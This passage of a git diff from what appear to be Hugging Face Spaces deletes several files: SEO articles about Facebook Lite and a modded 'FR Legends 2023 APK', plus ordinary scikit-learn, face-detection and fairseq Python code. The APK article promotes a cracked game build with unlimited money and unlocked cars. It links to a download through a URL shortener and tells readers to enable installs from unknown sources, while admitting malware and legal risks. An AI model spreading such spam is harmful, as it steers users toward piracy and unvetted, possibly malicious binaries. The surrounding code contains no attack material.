      Another difference between Facebook and Facebook Lite is their features and performance. Facebook Lite has most of the basic features of Facebook, such as posting, commenting, liking, messaging, calling, watching videos, and browsing pages and groups. However, some features are not available or limited on Facebook Lite, such as stories, live streams, reactions, stickers, games, marketplace, dating, and dark mode. On the other hand, Facebook Lite is faster and more reliable than Facebook on slow or unstable connections. It also works well on older or weaker devices that may struggle with running Facebook smoothly.

      -

      Conclusion

      -

      In conclusion, Facebook is a great app for Android users who want to enjoy the full social media experience with all its features and functions. However, if you have a limited device storage or data plan, or if you live in an area with poor network coverage, you may want to try Facebook Lite instead. It is a lighter and faster version of Facebook that still lets you stay connected with your friends and family.

      -

      So what are you waiting for? Download Facebook or Facebook Lite for Android today and join the millions of people who use it every day!

      -

      Frequently Asked Questions

      -

      How do I update Facebook or Facebook Lite for Android?

      -

      To update Facebook or Facebook Lite for Android, you can either go to the Google Play Store app and check for updates, or you can visit their respective websites and download the latest APK files.

      -

      How do I delete Facebook or Facebook Lite for Android?

      -

      To delete Facebook or Facebook Lite for Android, you can either go to your device settings and uninstall them like any other app, or you can go to their respective websites and follow the instructions to deactivate or delete your account.

      -

      How do I switch between Facebook and Facebook Lite for Android?

      -

      To switch between Facebook and Facebook Lite for Android, you can either install both apps on your device and use them interchangeably, or you can uninstall one app and install the other one instead.

      -

      How do I contact Facebook support for Android?

      -

      To contact Facebook support for Android, you can either go to their Help Center website and browse through their topics and FAQs, or you can go to their app settings and tap on Help & Support.

      -

      How do I report a problem with Facebook or Facebook Lite for Android?

      -

      To report a problem with Facebook or Facebook Lite for Android, you can either go to their app settings and tap on Report a Problem, or you can go to their Help Center website and tap on Report a Problem.

      -
      -
      \ No newline at end of file diff --git a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/FR Legends 2023 APK The Best Racing Game of the Year.md b/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/FR Legends 2023 APK The Best Racing Game of the Year.md deleted file mode 100644 index aca339f013d135d83072783922516e00fd768b64..0000000000000000000000000000000000000000 --- a/spaces/simple0urra/skops-model-card-creator-2a23515a-d54e-4804-b365-27ed6e938735/example/FR Legends 2023 APK The Best Racing Game of the Year.md +++ /dev/null @@ -1,128 +0,0 @@ -
      -

      FR Legends 2023 APK: The Ultimate Drifting Game for Android

      -

      If you are a fan of drifting, you must have heard of FR Legends, the most popular and realistic drifting game for mobile devices. FR Legends is all about driving legendary front-engine, rear-wheel-drive (FR) cars at iconic circuits around the world, and customizing everything on your car, from engine swaps to body kits. You can also compete with other players online and show off your drifting skills on the leaderboards.

      -

      But what if you want to enjoy the game without spending real money or watching annoying ads? What if you want to access all the cars and tracks without grinding for hours? What if you want to play the latest version of the game with new features and improvements?

      -

      fr legends 2023 apk


      Download Ziphttps://ssurll.com/2uNRFb



      -

Well, there is a solution for you: FR Legends 2023 APK. This is a modified version of the original game that gives you unlimited money, unlocked cars, no ads, and more. In this article, we will tell you everything you need to know about FR Legends 2023 APK, including what it is, how to download and install it, why you should choose it, and what risks are involved. Let's get started!

      -

      What is FR Legends?

      -

      FR Legends is a drifting game developed by TWIN TURBO TECH CO., LTD, a Chinese indie game studio. It was released in 2018 for iOS and Android devices, and has since gained millions of fans worldwide. The game is praised for its realistic physics and graphics, its variety of customizable cars and tracks, and its online multiplayer mode.

      -

      Features of FR Legends

      -

      Realistic physics and graphics

      -

      One of the main attractions of FR Legends is its realistic physics engine that simulates the behavior of real cars on different surfaces and conditions. You can feel the weight transfer, the tire grip, the steering angle, and the throttle response as you drift your car around corners. The game also features stunning graphics that bring the cars and tracks to life. You can see the smoke, sparks, dust, and damage effects as you slide your car sideways.

      -

      Customizable cars and tracks

      -

      Another feature that makes FR Legends stand out is its customization system that lets you modify every aspect of your car. You can choose from dozens of FR cars from different manufacturers, such as Toyota, Nissan, Mazda, BMW, Ford, and more. You can also swap engines, change transmissions, adjust suspensions, install body kits, paint colors, add stickers, and more. You can even create your own custom tracks using the track editor.

      -

      Online multiplayer and leaderboards

      -

      If you want to challenge yourself and others, you can join the online multiplayer mode of FR Legends. You can either race against other players in solo or tandem battles, or join a team and cooperate with your teammates. You can also chat with other players using the voice chat feature. The game also has leaderboards that rank players based on their scores, skills, and reputation. You can earn rewards and trophies by climbing up the ranks.

      -

      How to download and install FR Legends 2023 APK?

      -

If you are interested in downloading and installing FR Legends 2023 APK on your Android device, you need to follow some simple steps. But before that, make sure that your device meets the following requirements:

      Requirements and compatibility

      -
        -
• Your device must run Android 4.1 or higher.
      • -
      • Your device must have at least 1 GB of RAM and 100 MB of free storage space.
      • -
      • Your device must have a stable internet connection to play online.
      • -
      • Your device must allow installation of apps from unknown sources. You can enable this option by going to Settings > Security > Unknown Sources and toggling it on.
      • -
      -

      Steps to download and install

      -
        -
      1. Click on this link to download the FR Legends 2023 APK file: [Download FR Legends 2023 APK].
      2. -
      3. Once the download is complete, locate the file in your device's file manager and tap on it to start the installation process.
      4. -
      5. Follow the instructions on the screen and grant the necessary permissions to the app.
      6. -
      7. Wait for the installation to finish and then launch the app from your home screen or app drawer.
      8. -
      9. Enjoy the game with unlimited money, unlocked cars, no ads, and more!
      10. -
      -

      Tips and tricks to enjoy the game

      • To drift better, master the throttle, brake, handbrake, and steering controls. You can also adjust the sensitivity and layout of the controls in the settings menu.
      • To earn more money, complete missions, challenges, and events. You can also watch videos or share the game on social media for extra rewards.
      • To customize your car, go to the garage menu and select the parts you want to change. You can preview the changes before applying them.
      • To create your own track, go to the track editor menu and use the tools provided. You can save and share your tracks with other players.
      • To play online, go to the online menu and choose a mode. You can join a random room or create your own, and you can invite your friends or chat with other players.

      Why choose FR Legends 2023 APK?

      You might be wondering why you should choose FR Legends 2023 APK over the original game. There are both benefits and risks to using this modified version, so let's take a look at each:


      Benefits of FR Legends 2023 APK

      Unlimited money and unlocked cars

      The most obvious benefit of FR Legends 2023 APK is that it gives you unlimited money and every car unlocked. You can buy any car you want, upgrade it to the max, and customize it to your liking, without grinding for hours or worrying about running out of money. You can also try out different cars and see which one suits your style best.

      No ads and no root needed

      Another benefit of FR Legends 2023 APK is that it removes all the ads from the game, so you can play without interruptions or distractions, without watching videos or waiting for timers to earn rewards, and with less data and battery spent on loading ads. Moreover, you don't need to root your device to use this modified version, so you can install it easily without risking damage or warranty issues.

      Latest version and updates

      The last benefit of FR Legends 2023 APK is that it is based on the latest version of the game, so you get all the new features and improvements the developers have added. As long as you download it from a trusted source, you can also receive regular updates and won't miss out on bug fixes or content updates.

      Risks of FR Legends 2023 APK

      Potential malware and viruses

      The first risk of FR Legends 2023 APK is that it might contain malware or viruses that can harm your device or steal your data, because this modified version is not verified by the Google Play Store or any other official source. Be careful where you download it from and what permissions you grant it, and scan the file with an antivirus app before installing it.
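      On top of the antivirus scan mentioned above, one simple sanity check before installing any APK from outside an official store is to compare the file's SHA-256 fingerprint against a checksum published by a source you trust. A minimal sketch, assuming a hypothetical file name:

```shell
# Hypothetical file name -- replace with your actual download.
APK=fr-legends-2023.apk

if [ -f "$APK" ]; then
    # Print the SHA-256 fingerprint; compare it against a checksum
    # published by a source you trust before installing.
    sha256sum "$APK"
else
    echo "Download $APK first"
fi
```

      If the printed hash does not match the published one, the file was altered or corrupted somewhere along the way and should not be installed.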

      Legal issues and bans

      The second risk of FR Legends 2023 APK is that it may violate the terms and conditions of the original game, since it alters parts of the game that are protected by the game's developer and publisher. Using it could have legal consequences, and you might be banned from the online mode or the leaderboards if the game detects a hacked version. You should also respect the intellectual property of the game's creator and not distribute or share this modified version without their permission.

      Data loss and corruption

      The last risk of FR Legends 2023 APK is that it might cause data loss or corruption on your device or in the game, because the modified version may not be fully compatible with your device or with the original game. You might encounter errors, glitches, crashes, or freezes while playing, and you could lose your progress, achievements, or rewards if the modified version overwrites or deletes them. Always back up your data before installing or using it.

      Conclusion

      FR Legends is a fun and realistic drifting game that lets you drive and customize your favorite FR cars and tracks, and compete with other players online to show off your drifting skills. If you want to play without limitations or restrictions, you can try FR Legends 2023 APK, a modified version that gives you unlimited money, unlocked cars, no ads, and more. However, be aware of the risks involved: potential malware, legal issues, and data loss. Always download it from a trusted source, scan it with an antivirus app before installing, and respect the game's developer and publisher by not distributing or sharing this modified version without their permission.


      We hope this article has helped you understand what FR Legends 2023 APK is, how to download and install it, why you should choose it, and what are the risks involved. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!


      FAQs

      • What is FR Legends?
        FR Legends is a drifting game for mobile devices that lets you drive and customize your favorite FR cars and tracks.
      • What is FR Legends 2023 APK?
        FR Legends 2023 APK is a modified version of the original game that gives you unlimited money, unlocked cars, no ads, and more.
      • How do I download and install FR Legends 2023 APK?
        Download the APK file from the link in this article, locate it in your device's file manager, tap on it to start the installation, grant the necessary permissions, and launch the app once the installation finishes.
      • Why choose FR Legends 2023 APK?
        Choose FR Legends 2023 APK if you want to enjoy the game without limitations or restrictions while still getting all the new features and updates the original game has to offer.
      • What are the risks of FR Legends 2023 APK?
        The risks are potential malware, legal issues, and data loss. Be careful where you download it from and what permissions you grant it, back up your data before installing or using it, and don't distribute or share it without the developer's and publisher's permission.
      \ No newline at end of file diff --git a/spaces/sklearn-docs/Univariate-feature-selection/app.py b/spaces/sklearn-docs/Univariate-feature-selection/app.py deleted file mode 100644 index d5fadaf537c74d58e6f1e49727f374b7965fbd1b..0000000000000000000000000000000000000000 --- a/spaces/sklearn-docs/Univariate-feature-selection/app.py +++ /dev/null @@ -1,118 +0,0 @@ -import gradio as gr -import time -import numpy as np -import matplotlib.pyplot as plt -from sklearn.datasets import load_iris -from sklearn.model_selection import train_test_split -from sklearn.feature_selection import SelectKBest, f_classif -from sklearn.pipeline import make_pipeline -from sklearn.preprocessing import MinMaxScaler -from sklearn.svm import LinearSVC - -theme = gr.themes.Monochrome( - primary_hue="indigo", - secondary_hue="blue", - neutral_hue="slate", -) -model_card = f""" -## Description - -**Univariate feature selection** can be used to improve classification accuracy on a noisy dataset. -In **univariate feature selection**, each feature is evaluated independently, and a statistical test is used to determine its strength of association with the target variable. -The most important features are then selected based on their statistical significance, typically using a threshold p-value or a pre-defined number of top features to select. - -In this demo, some noisy (non informative) features are added to the iris dataset then use **Support vector machine (SVM)** to classify the Iris dataset both before and after applying univariate feature selection. -The results of the feature selection are presented through p-values and weights of SVMs, which are plotted for comparison. -The objective of this demo is to evaluate the accuracy of the models and assess the impact of univariate feature selection on the model weights. -You can play around with different ``number of top features`` and ``random seed``. 
- -## Dataset - -Iris dataset -""" -# The iris dataset -X, y = load_iris(return_X_y=True) - -# Some noisy data not correlated -E = np.random.RandomState(42).uniform(0, 0.1, size=(X.shape[0], 20)) - -# Add the noisy data to the informative features -X = np.hstack((X, E)) - - -def do_train(k_features, random_state): - # Split dataset to select feature and evaluate the classifier - X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y, random_state=random_state) - selector = SelectKBest(f_classif, k=k_features) - selector.fit(X_train, y_train) - scores = -np.log10(selector.pvalues_) - scores /= scores.max() - - - fig1, axes1 = plt.subplots() - X_indices = np.arange(X.shape[-1]) - axes1.bar(X_indices - 0.05, scores, width=0.2) - axes1.set_title("Feature univariate score") - axes1.set_xlabel("Feature number") - axes1.set_ylabel(r"Univariate score ($-Log(p_{value})$)") - - clf = make_pipeline(MinMaxScaler(), LinearSVC()) - clf.fit(X_train, y_train) - - svm_weights = np.abs(clf[-1].coef_).sum(axis=0) - svm_weights /= svm_weights.sum() - - clf_selected = make_pipeline(SelectKBest(f_classif, k=k_features), MinMaxScaler(), LinearSVC()) - clf_selected.fit(X_train, y_train) - - svm_weights_selected = np.abs(clf_selected[-1].coef_).sum(axis=0) - svm_weights_selected /= svm_weights_selected.sum() - - fig2, axes2 = plt.subplots() - axes2.bar( - X_indices - 0.45, scores, width=0.2, label=r"Univariate score ($-Log(p_{value})$)" - ) - - axes2.bar(X_indices - 0.25, svm_weights, width=0.2, label="SVM weight") - - axes2.bar( - X_indices[selector.get_support()] - 0.05, - svm_weights_selected, - width=0.2, - label="SVM weights after selection", - ) - - axes2.set_title("Comparing feature selection") - axes2.set_xlabel("Feature number") - axes2.set_yticks(()) - axes2.axis("tight") - axes2.legend(loc="upper right") - - text = f"Classification accuracy without selecting features: {clf.score(X_test, y_test)*100:.2f}%. 
Classification accuracy after univariate feature selection: {clf_selected.score(X_test, y_test)*100:.2f}%" - - return fig1, fig2, text - - - -with gr.Blocks(theme=theme) as demo: - gr.Markdown(''' -
      -

      Univariate Feature Selection

      -
      - ''') - gr.Markdown(model_card) - gr.Markdown("Author: Vu Minh Chien. Based on the example from scikit-learn") - k_features = gr.Slider(minimum=2, maximum=10, step=1, value=2, label="Number of top features to select") - random_state = gr.Slider(minimum=0, maximum=2000, step=1, value=0, label="Random seed") - with gr.Row(): - with gr.Column(): - plot_1 = gr.Plot(label="Univariate score") - with gr.Column(): - plot_2 = gr.Plot(label="Comparing feature selection") - with gr.Row(): - resutls = gr.Textbox(label="Results") - - k_features.change(fn=do_train, inputs=[k_features, random_state], outputs=[plot_1, plot_2, resutls]) - random_state.change(fn=do_train, inputs=[k_features, random_state], outputs=[plot_1, plot_2, resutls]) - -demo.launch() \ No newline at end of file diff --git a/spaces/sky24h/Free-View_Expressive_Talking_Head_Video_Editing/face_detection/utils.py b/spaces/sky24h/Free-View_Expressive_Talking_Head_Video_Editing/face_detection/utils.py deleted file mode 100644 index 3dc4cf3e328efaa227cbcfdd969e1056688adad5..0000000000000000000000000000000000000000 --- a/spaces/sky24h/Free-View_Expressive_Talking_Head_Video_Editing/face_detection/utils.py +++ /dev/null @@ -1,313 +0,0 @@ -from __future__ import print_function -import os -import sys -import time -import torch -import math -import numpy as np -import cv2 - - -def _gaussian( - size=3, sigma=0.25, amplitude=1, normalize=False, width=None, - height=None, sigma_horz=None, sigma_vert=None, mean_horz=0.5, - mean_vert=0.5): - # handle some defaults - if width is None: - width = size - if height is None: - height = size - if sigma_horz is None: - sigma_horz = sigma - if sigma_vert is None: - sigma_vert = sigma - center_x = mean_horz * width + 0.5 - center_y = mean_vert * height + 0.5 - gauss = np.empty((height, width), dtype=np.float32) - # generate kernel - for i in range(height): - for j in range(width): - gauss[i][j] = amplitude * math.exp(-(math.pow((j + 1 - center_x) / ( - sigma_horz * width), 2) / 
2.0 + math.pow((i + 1 - center_y) / (sigma_vert * height), 2) / 2.0)) - if normalize: - gauss = gauss / np.sum(gauss) - return gauss - - -def draw_gaussian(image, point, sigma): - # Check if the gaussian is inside - ul = [math.floor(point[0] - 3 * sigma), math.floor(point[1] - 3 * sigma)] - br = [math.floor(point[0] + 3 * sigma), math.floor(point[1] + 3 * sigma)] - if (ul[0] > image.shape[1] or ul[1] > image.shape[0] or br[0] < 1 or br[1] < 1): - return image - size = 6 * sigma + 1 - g = _gaussian(size) - g_x = [int(max(1, -ul[0])), int(min(br[0], image.shape[1])) - int(max(1, ul[0])) + int(max(1, -ul[0]))] - g_y = [int(max(1, -ul[1])), int(min(br[1], image.shape[0])) - int(max(1, ul[1])) + int(max(1, -ul[1]))] - img_x = [int(max(1, ul[0])), int(min(br[0], image.shape[1]))] - img_y = [int(max(1, ul[1])), int(min(br[1], image.shape[0]))] - assert (g_x[0] > 0 and g_y[1] > 0) - image[img_y[0] - 1:img_y[1], img_x[0] - 1:img_x[1] - ] = image[img_y[0] - 1:img_y[1], img_x[0] - 1:img_x[1]] + g[g_y[0] - 1:g_y[1], g_x[0] - 1:g_x[1]] - image[image > 1] = 1 - return image - - -def transform(point, center, scale, resolution, invert=False): - """Generate and affine transformation matrix. - - Given a set of points, a center, a scale and a targer resolution, the - function generates and affine transformation matrix. If invert is ``True`` - it will produce the inverse transformation. 
- - Arguments: - point {torch.tensor} -- the input 2D point - center {torch.tensor or numpy.array} -- the center around which to perform the transformations - scale {float} -- the scale of the face/object - resolution {float} -- the output resolution - - Keyword Arguments: - invert {bool} -- define wherever the function should produce the direct or the - inverse transformation matrix (default: {False}) - """ - _pt = torch.ones(3) - _pt[0] = point[0] - _pt[1] = point[1] - - h = 200.0 * scale - t = torch.eye(3) - t[0, 0] = resolution / h - t[1, 1] = resolution / h - t[0, 2] = resolution * (-center[0] / h + 0.5) - t[1, 2] = resolution * (-center[1] / h + 0.5) - - if invert: - t = torch.inverse(t) - - new_point = (torch.matmul(t, _pt))[0:2] - - return new_point.int() - - -def crop(image, center, scale, resolution=256.0): - """Center crops an image or set of heatmaps - - Arguments: - image {numpy.array} -- an rgb image - center {numpy.array} -- the center of the object, usually the same as of the bounding box - scale {float} -- scale of the face - - Keyword Arguments: - resolution {float} -- the size of the output cropped image (default: {256.0}) - - Returns: - [type] -- [description] - """ # Crop around the center point - """ Crops the image around the center. 
Input is expected to be an np.ndarray """ - ul = transform([1, 1], center, scale, resolution, True) - br = transform([resolution, resolution], center, scale, resolution, True) - # pad = math.ceil(torch.norm((ul - br).float()) / 2.0 - (br[0] - ul[0]) / 2.0) - if image.ndim > 2: - newDim = np.array([br[1] - ul[1], br[0] - ul[0], - image.shape[2]], dtype=np.int32) - newImg = np.zeros(newDim, dtype=np.uint8) - else: - newDim = np.array([br[1] - ul[1], br[0] - ul[0]], dtype=np.int) - newImg = np.zeros(newDim, dtype=np.uint8) - ht = image.shape[0] - wd = image.shape[1] - newX = np.array( - [max(1, -ul[0] + 1), min(br[0], wd) - ul[0]], dtype=np.int32) - newY = np.array( - [max(1, -ul[1] + 1), min(br[1], ht) - ul[1]], dtype=np.int32) - oldX = np.array([max(1, ul[0] + 1), min(br[0], wd)], dtype=np.int32) - oldY = np.array([max(1, ul[1] + 1), min(br[1], ht)], dtype=np.int32) - newImg[newY[0] - 1:newY[1], newX[0] - 1:newX[1] - ] = image[oldY[0] - 1:oldY[1], oldX[0] - 1:oldX[1], :] - newImg = cv2.resize(newImg, dsize=(int(resolution), int(resolution)), - interpolation=cv2.INTER_LINEAR) - return newImg - - -def get_preds_fromhm(hm, center=None, scale=None): - """Obtain (x,y) coordinates given a set of N heatmaps. If the center - and the scale is provided the function will return the points also in - the original coordinate frame. 
- - Arguments: - hm {torch.tensor} -- the predicted heatmaps, of shape [B, N, W, H] - - Keyword Arguments: - center {torch.tensor} -- the center of the bounding box (default: {None}) - scale {float} -- face scale (default: {None}) - """ - max, idx = torch.max( - hm.view(hm.size(0), hm.size(1), hm.size(2) * hm.size(3)), 2) - idx += 1 - preds = idx.view(idx.size(0), idx.size(1), 1).repeat(1, 1, 2).float() - preds[..., 0].apply_(lambda x: (x - 1) % hm.size(3) + 1) - preds[..., 1].add_(-1).div_(hm.size(2)).floor_().add_(1) - - for i in range(preds.size(0)): - for j in range(preds.size(1)): - hm_ = hm[i, j, :] - pX, pY = int(preds[i, j, 0]) - 1, int(preds[i, j, 1]) - 1 - if pX > 0 and pX < 63 and pY > 0 and pY < 63: - diff = torch.FloatTensor( - [hm_[pY, pX + 1] - hm_[pY, pX - 1], - hm_[pY + 1, pX] - hm_[pY - 1, pX]]) - preds[i, j].add_(diff.sign_().mul_(.25)) - - preds.add_(-.5) - - preds_orig = torch.zeros(preds.size()) - if center is not None and scale is not None: - for i in range(hm.size(0)): - for j in range(hm.size(1)): - preds_orig[i, j] = transform( - preds[i, j], center, scale, hm.size(2), True) - - return preds, preds_orig - -def get_preds_fromhm_batch(hm, centers=None, scales=None): - """Obtain (x,y) coordinates given a set of N heatmaps. If the centers - and the scales is provided the function will return the points also in - the original coordinate frame. 
- - Arguments: - hm {torch.tensor} -- the predicted heatmaps, of shape [B, N, W, H] - - Keyword Arguments: - centers {torch.tensor} -- the centers of the bounding box (default: {None}) - scales {float} -- face scales (default: {None}) - """ - max, idx = torch.max( - hm.view(hm.size(0), hm.size(1), hm.size(2) * hm.size(3)), 2) - idx += 1 - preds = idx.view(idx.size(0), idx.size(1), 1).repeat(1, 1, 2).float() - preds[..., 0].apply_(lambda x: (x - 1) % hm.size(3) + 1) - preds[..., 1].add_(-1).div_(hm.size(2)).floor_().add_(1) - - for i in range(preds.size(0)): - for j in range(preds.size(1)): - hm_ = hm[i, j, :] - pX, pY = int(preds[i, j, 0]) - 1, int(preds[i, j, 1]) - 1 - if pX > 0 and pX < 63 and pY > 0 and pY < 63: - diff = torch.FloatTensor( - [hm_[pY, pX + 1] - hm_[pY, pX - 1], - hm_[pY + 1, pX] - hm_[pY - 1, pX]]) - preds[i, j].add_(diff.sign_().mul_(.25)) - - preds.add_(-.5) - - preds_orig = torch.zeros(preds.size()) - if centers is not None and scales is not None: - for i in range(hm.size(0)): - for j in range(hm.size(1)): - preds_orig[i, j] = transform( - preds[i, j], centers[i], scales[i], hm.size(2), True) - - return preds, preds_orig - -def shuffle_lr(parts, pairs=None): - """Shuffle the points left-right according to the axis of symmetry - of the object. - - Arguments: - parts {torch.tensor} -- a 3D or 4D object containing the - heatmaps. - - Keyword Arguments: - pairs {list of integers} -- [order of the flipped points] (default: {None}) - """ - if pairs is None: - pairs = [16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0, - 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 27, 28, 29, 30, 35, - 34, 33, 32, 31, 45, 44, 43, 42, 47, 46, 39, 38, 37, 36, 41, - 40, 54, 53, 52, 51, 50, 49, 48, 59, 58, 57, 56, 55, 64, 63, - 62, 61, 60, 67, 66, 65] - if parts.ndimension() == 3: - parts = parts[pairs, ...] - else: - parts = parts[:, pairs, ...] 
- - return parts - - -def flip(tensor, is_label=False): - """Flip an image or a set of heatmaps left-right - - Arguments: - tensor {numpy.array or torch.tensor} -- [the input image or heatmaps] - - Keyword Arguments: - is_label {bool} -- [denote wherever the input is an image or a set of heatmaps ] (default: {False}) - """ - if not torch.is_tensor(tensor): - tensor = torch.from_numpy(tensor) - - if is_label: - tensor = shuffle_lr(tensor).flip(tensor.ndimension() - 1) - else: - tensor = tensor.flip(tensor.ndimension() - 1) - - return tensor - -# From pyzolib/paths.py (https://bitbucket.org/pyzo/pyzolib/src/tip/paths.py) - - -def appdata_dir(appname=None, roaming=False): - """ appdata_dir(appname=None, roaming=False) - - Get the path to the application directory, where applications are allowed - to write user specific files (e.g. configurations). For non-user specific - data, consider using common_appdata_dir(). - If appname is given, a subdir is appended (and created if necessary). - If roaming is True, will prefer a roaming directory (Windows Vista/7). 
- """ - - # Define default user directory - userDir = os.getenv('FACEALIGNMENT_USERDIR', None) - if userDir is None: - userDir = os.path.expanduser('~') - if not os.path.isdir(userDir): # pragma: no cover - userDir = '/var/tmp' # issue #54 - - # Get system app data dir - path = None - if sys.platform.startswith('win'): - path1, path2 = os.getenv('LOCALAPPDATA'), os.getenv('APPDATA') - path = (path2 or path1) if roaming else (path1 or path2) - elif sys.platform.startswith('darwin'): - path = os.path.join(userDir, 'Library', 'Application Support') - # On Linux and as fallback - if not (path and os.path.isdir(path)): - path = userDir - - # Maybe we should store things local to the executable (in case of a - # portable distro or a frozen application that wants to be portable) - prefix = sys.prefix - if getattr(sys, 'frozen', None): - prefix = os.path.abspath(os.path.dirname(sys.executable)) - for reldir in ('settings', '../settings'): - localpath = os.path.abspath(os.path.join(prefix, reldir)) - if os.path.isdir(localpath): # pragma: no cover - try: - open(os.path.join(localpath, 'test.write'), 'wb').close() - os.remove(os.path.join(localpath, 'test.write')) - except IOError: - pass # We cannot write in this directory - else: - path = localpath - break - - # Get path specific for this app - if appname: - if path == userDir: - appname = '.' 
+ appname.lstrip('.') # Make it a hidden directory - path = os.path.join(path, appname) - if not os.path.isdir(path): # pragma: no cover - os.mkdir(path) - - # Done - return path diff --git a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/data/fairseq_dataset.py b/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/data/fairseq_dataset.py deleted file mode 100644 index 23e6992dbaf34e52f2fdcd0c8fc418c93744ea4e..0000000000000000000000000000000000000000 --- a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/data/fairseq_dataset.py +++ /dev/null @@ -1,205 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import numpy as np -import torch.utils.data -from fairseq.data import data_utils - -logger = logging.getLogger(__name__) - - -class EpochListening: - """Mixin for receiving updates whenever the epoch increments.""" - - @property - def can_reuse_epoch_itr_across_epochs(self): - """ - Whether we can reuse the :class:`fairseq.data.EpochBatchIterator` for - this dataset across epochs. - - This needs to return ``False`` if the sample sizes can change across - epochs, in which case we may need to regenerate batches at each epoch. - If your dataset relies in ``set_epoch`` then you should consider setting - this to ``False``. - """ - return True - - def set_epoch(self, epoch): - """Will receive the updated epoch number at the beginning of the epoch.""" - pass - - -class FairseqDataset(torch.utils.data.Dataset, EpochListening): - """A dataset that provides helpers for batching.""" - - def __getitem__(self, index): - raise NotImplementedError - - def __len__(self): - raise NotImplementedError - - def collater(self, samples): - """Merge a list of samples to form a mini-batch. 
- - Args: - samples (List[dict]): samples to collate - - Returns: - dict: a mini-batch suitable for forwarding with a Model - """ - raise NotImplementedError - - def num_tokens(self, index): - """Return the number of tokens in a sample. This value is used to - enforce ``--max-tokens`` during batching.""" - raise NotImplementedError - - def num_tokens_vec(self, indices): - """Return the number of tokens for a set of positions defined by indices. - This value is used to enforce ``--max-tokens`` during batching.""" - raise NotImplementedError - - def size(self, index): - """Return an example's size as a float or tuple. This value is used when - filtering a dataset with ``--max-positions``.""" - raise NotImplementedError - - def ordered_indices(self): - """Return an ordered list of indices. Batches will be constructed based - on this order.""" - return np.arange(len(self), dtype=np.int64) - - @property - def supports_prefetch(self): - """Whether this dataset supports prefetching.""" - return False - - def attr(self, attr: str, index: int): - return getattr(self, attr, None) - - def prefetch(self, indices): - """Prefetch the data required for this epoch.""" - raise NotImplementedError - - def get_batch_shapes(self): - """ - Return a list of valid batch shapes, for example:: - - [(8, 512), (16, 256), (32, 128)] - - The first dimension of each tuple is the batch size and can be ``None`` - to automatically infer the max batch size based on ``--max-tokens``. - The second dimension of each tuple is the max supported length as given - by :func:`fairseq.data.FairseqDataset.num_tokens`. - - This will be used by :func:`fairseq.data.FairseqDataset.batch_by_size` - to restrict batch shapes. This is useful on TPUs to avoid too many - dynamic shapes (and recompilations). 
- """ - return None - - def batch_by_size( - self, - indices, - max_tokens=None, - max_sentences=None, - required_batch_size_multiple=1, - ): - """ - Given an ordered set of indices, return batches according to - *max_tokens*, *max_sentences* and *required_batch_size_multiple*. - """ - from fairseq.data import data_utils - - fixed_shapes = self.get_batch_shapes() - if fixed_shapes is not None: - - def adjust_bsz(bsz, num_tokens): - if bsz is None: - assert max_tokens is not None, "Must specify --max-tokens" - bsz = max_tokens // num_tokens - if max_sentences is not None: - bsz = min(bsz, max_sentences) - elif ( - bsz >= required_batch_size_multiple - and bsz % required_batch_size_multiple != 0 - ): - bsz -= bsz % required_batch_size_multiple - return bsz - - fixed_shapes = np.array( - [ - [adjust_bsz(bsz, num_tokens), num_tokens] - for (bsz, num_tokens) in fixed_shapes - ] - ) - - try: - num_tokens_vec = self.num_tokens_vec(indices).astype('int64') - except NotImplementedError: - num_tokens_vec = None - - return data_utils.batch_by_size( - indices, - num_tokens_fn=self.num_tokens, - num_tokens_vec=num_tokens_vec, - max_tokens=max_tokens, - max_sentences=max_sentences, - required_batch_size_multiple=required_batch_size_multiple, - fixed_shapes=fixed_shapes, - ) - - def filter_indices_by_size(self, indices, max_sizes): - """ - Filter a list of sample indices. Remove those that are longer than - specified in *max_sizes*. 
- - WARNING: don't update, override method in child classes - - Args: - indices (np.array): original array of sample indices - max_sizes (int or list[int] or tuple[int]): max sample size, - can be defined separately for src and tgt (then list or tuple) - - Returns: - np.array: filtered sample array - list: list of removed indices - """ - if isinstance(max_sizes, float) or isinstance(max_sizes, int): - if hasattr(self, "sizes") and isinstance(self.sizes, np.ndarray): - ignored = indices[self.sizes[indices] > max_sizes].tolist() - indices = indices[self.sizes[indices] <= max_sizes] - elif ( - hasattr(self, "sizes") - and isinstance(self.sizes, list) - and len(self.sizes) == 1 - ): - ignored = indices[self.sizes[0][indices] > max_sizes].tolist() - indices = indices[self.sizes[0][indices] <= max_sizes] - else: - indices, ignored = data_utils._filter_by_size_dynamic( - indices, self.size, max_sizes - ) - else: - indices, ignored = data_utils._filter_by_size_dynamic( - indices, self.size, max_sizes - ) - return indices, ignored - - @property - def supports_fetch_outside_dataloader(self): - """Whether this dataset supports fetching outside the workers of the dataloader.""" - return True - - -class FairseqIterableDataset(torch.utils.data.IterableDataset, EpochListening): - """ - For datasets that need to be read sequentially, usually because the data is - being streamed or otherwise can't be manipulated on a single machine. 
- """ - - def __iter__(self): - raise NotImplementedError diff --git a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/models/speech_to_text/berard.py b/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/models/speech_to_text/berard.py deleted file mode 100644 index c505e3acaa84e5f3263ccbfaf9556f77123f09fc..0000000000000000000000000000000000000000 --- a/spaces/sriramelango/Social_Classification_Public/fairseq/fairseq/models/speech_to_text/berard.py +++ /dev/null @@ -1,606 +0,0 @@ -#!/usr/bin/env python3 - -from ast import literal_eval -from typing import List, Tuple - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import checkpoint_utils, utils -from fairseq.data.data_utils import lengths_to_padding_mask -from fairseq.models import ( - FairseqEncoder, - FairseqEncoderDecoderModel, - FairseqIncrementalDecoder, - register_model, - register_model_architecture, -) - - -@register_model("s2t_berard") -class BerardModel(FairseqEncoderDecoderModel): - """Implementation of a model similar to https://arxiv.org/abs/1802.04200 - - Paper title: End-to-End Automatic Speech Translation of Audiobooks - An implementation is available in tensorflow at - https://github.com/eske/seq2seq - Relevant files in this implementation are the config - 